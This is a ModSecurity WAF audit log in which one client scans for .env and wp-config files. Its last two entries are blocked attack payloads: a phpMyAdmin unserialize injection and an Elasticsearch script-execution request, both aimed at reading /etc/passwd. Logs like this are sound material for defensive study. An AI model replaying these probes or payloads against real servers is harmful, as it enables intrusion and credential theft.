Intercepted (phase 1) Stopwatch: 1748884570970221 667 (- - -) Stopwatch2: 1748884570970221 667; combined=282, p1=249, p2=0, p3=0, p4=0, p5=32, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e74db529-Z-- --62245462-A-- [03/Jun/2025:00:16:11 +0700] aD3cW0A6be0-boUGPH241AAAAM4 103.236.140.4 57800 103.236.140.4 8181 --62245462-B-- GET /apps/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --62245462-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62245462-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884571150952 840 (- - -) Stopwatch2: 1748884571150952 840; combined=362, p1=324, p2=0, p3=0, p4=0, p5=38, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62245462-Z-- --56d62e55-A-- [03/Jun/2025:00:16:11 +0700] aD3cW38VMK8tZef_-m8ODAAAAFg 103.236.140.4 57802 103.236.140.4 8181 --56d62e55-B-- GET /back/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --56d62e55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56d62e55-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884571331911 704 (- - -) Stopwatch2: 1748884571331911 704; combined=267, p1=234, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56d62e55-Z-- --b895370a-A-- [03/Jun/2025:00:16:11 +0700] aD3cW0A6be0-boUGPH241QAAAM0 103.236.140.4 57804 103.236.140.4 8181 --b895370a-B-- GET /core/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --b895370a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b895370a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884571512731 651 (- - -) Stopwatch2: 1748884571512731 651; combined=258, p1=224, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b895370a-Z-- --c65d8741-A-- [03/Jun/2025:00:16:11 +0700] aD3cW38VMK8tZef_-m8ODgAAAFc 103.236.140.4 57808 103.236.140.4 8181 --c65d8741-B-- GET /cp/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --c65d8741-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c65d8741-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884571693456 767 (- - -) Stopwatch2: 1748884571693456 767; combined=294, p1=257, p2=0, p3=0, p4=0, p5=36, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c65d8741-Z-- --6ec64a41-A-- [03/Jun/2025:00:16:11 +0700] aD3cW0A6be0-boUGPH241gAAAMk 103.236.140.4 57810 103.236.140.4 8181 --6ec64a41-B-- GET /development/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --6ec64a41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ec64a41-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884571874329 770 (- - -) Stopwatch2: 1748884571874329 770; combined=306, p1=268, p2=0, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ec64a41-Z-- --94e69e77-A-- [03/Jun/2025:00:16:12 +0700] aD3cXEA6be0-boUGPH241wAAAMo 103.236.140.4 57812 103.236.140.4 8181 --94e69e77-B-- GET /docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --94e69e77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94e69e77-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884572055162 732 (- - -) Stopwatch2: 1748884572055162 732; combined=342, p1=311, p2=0, p3=0, p4=0, p5=31, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94e69e77-Z-- --aaa6d71c-A-- [03/Jun/2025:00:16:12 +0700] aD3cXO6eDjh4wF4csdutMQAAAJM 103.236.140.4 57814 103.236.140.4 8181 --aaa6d71c-B-- GET /fedex/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --aaa6d71c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aaa6d71c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884572236116 680 (- - -) Stopwatch2: 1748884572236116 680; combined=280, p1=247, p2=0, p3=0, p4=0, p5=33, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aaa6d71c-Z-- --bced620a-A-- [03/Jun/2025:00:16:12 +0700] aD3cXEA6be0-boUGPH242AAAANg 103.236.140.4 57816 103.236.140.4 8181 --bced620a-B-- GET /local/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --bced620a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bced620a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884572416890 714 (- - -) Stopwatch2: 1748884572416890 714; combined=296, p1=264, p2=0, p3=0, p4=0, p5=32, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bced620a-Z-- --2b0a0b67-A-- [03/Jun/2025:00:16:12 +0700] aD3cXH8VMK8tZef_-m8ODwAAAEI 103.236.140.4 57818 103.236.140.4 8181 --2b0a0b67-B-- GET /private/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --2b0a0b67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b0a0b67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884572597882 690 (- - -) Stopwatch2: 1748884572597882 690; combined=267, p1=228, p2=0, p3=0, p4=0, p5=38, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b0a0b67-Z-- --620f0544-A-- [03/Jun/2025:00:16:12 +0700] aD3cXH8VMK8tZef_-m8OEAAAAEE 103.236.140.4 57820 103.236.140.4 8181 --620f0544-B-- GET /rest/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --620f0544-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --620f0544-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884572778780 677 (- - -) Stopwatch2: 1748884572778780 677; combined=255, p1=222, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --620f0544-Z-- --c6c14a6c-A-- [03/Jun/2025:00:16:12 +0700] aD3cXH8VMK8tZef_-m8OEQAAAFU 103.236.140.4 57822 103.236.140.4 8181 --c6c14a6c-B-- GET /shared/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --c6c14a6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6c14a6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884572959572 643 (- - -) Stopwatch2: 1748884572959572 643; combined=255, p1=223, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6c14a6c-Z-- --a23c0c69-A-- [03/Jun/2025:00:16:13 +0700] aD3cXUA6be0-boUGPH242QAAANE 103.236.140.4 57824 103.236.140.4 8181 --a23c0c69-B-- GET /sources/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --a23c0c69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a23c0c69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884573140439 644 (- - -) Stopwatch2: 1748884573140439 644; combined=257, p1=223, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a23c0c69-Z-- --4033a470-A-- [03/Jun/2025:00:16:13 +0700] aD3cXX8VMK8tZef_-m8OEgAAAFY 103.236.140.4 57826 103.236.140.4 8181 --4033a470-B-- GET /system/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --4033a470-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4033a470-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884573321326 857 (- - -) Stopwatch2: 1748884573321326 857; combined=328, p1=286, p2=0, p3=0, p4=0, p5=41, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4033a470-Z-- --fbb13e49-A-- [03/Jun/2025:00:16:13 +0700] aD3cXe6eDjh4wF4csdutMgAAAIc 103.236.140.4 57828 103.236.140.4 8181 --fbb13e49-B-- GET /wp-config.php~ HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --fbb13e49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbb13e49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748884573502394 714 (- - -) Stopwatch2: 1748884573502394 714; combined=290, p1=256, p2=0, p3=0, p4=0, p5=34, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbb13e49-Z-- --b5f6bc7c-A-- [03/Jun/2025:00:16:13 +0700] aD3cXe6eDjh4wF4csdutNAAAAII 103.236.140.4 57834 103.236.140.4 8181 --b5f6bc7c-B-- GET /wp-config.inc HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.232.140.197 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.232.140.197 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --b5f6bc7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5f6bc7c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748884573683301 2613 (- - -) Stopwatch2: 1748884573683301 2613; combined=1004, p1=417, p2=556, p3=0, p4=0, p5=31, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5f6bc7c-Z-- --cc6f292d-A-- [03/Jun/2025:00:35:18 +0700] aD3g1u6eDjh4wF4csdutdQAAAIE 103.236.140.4 58614 103.236.140.4 8181 --cc6f292d-B-- POST /scripts/setup.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 80 User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 167390125 --cc6f292d-C-- action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} --cc6f292d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc6f292d-E-- --cc6f292d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/setup.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748885718687487 2015 (- - -) Stopwatch2: 1748885718687487 2015; combined=731, p1=336, p2=364, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc6f292d-Z-- --c3d9682d-A-- [03/Jun/2025:00:35:18 +0700] aD3g1u6eDjh4wF4csdutcwAAAJg 103.236.140.4 58610 103.236.140.4 8181 --c3d9682d-B-- POST /_search?pretty HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 369 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171242296 --c3d9682d-C-- { "size": 1, "query": { "filtered": { "query": { "match_all": { } } } }, "script_fields": { "command": { "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();" } } } --c3d9682d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3d9682d-E-- --c3d9682d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /_search?pretty"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748885718687278 2442 (- - -) Stopwatch2: 1748885718687278 2442; combined=790, p1=387, p2=366, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3d9682d-Z-- 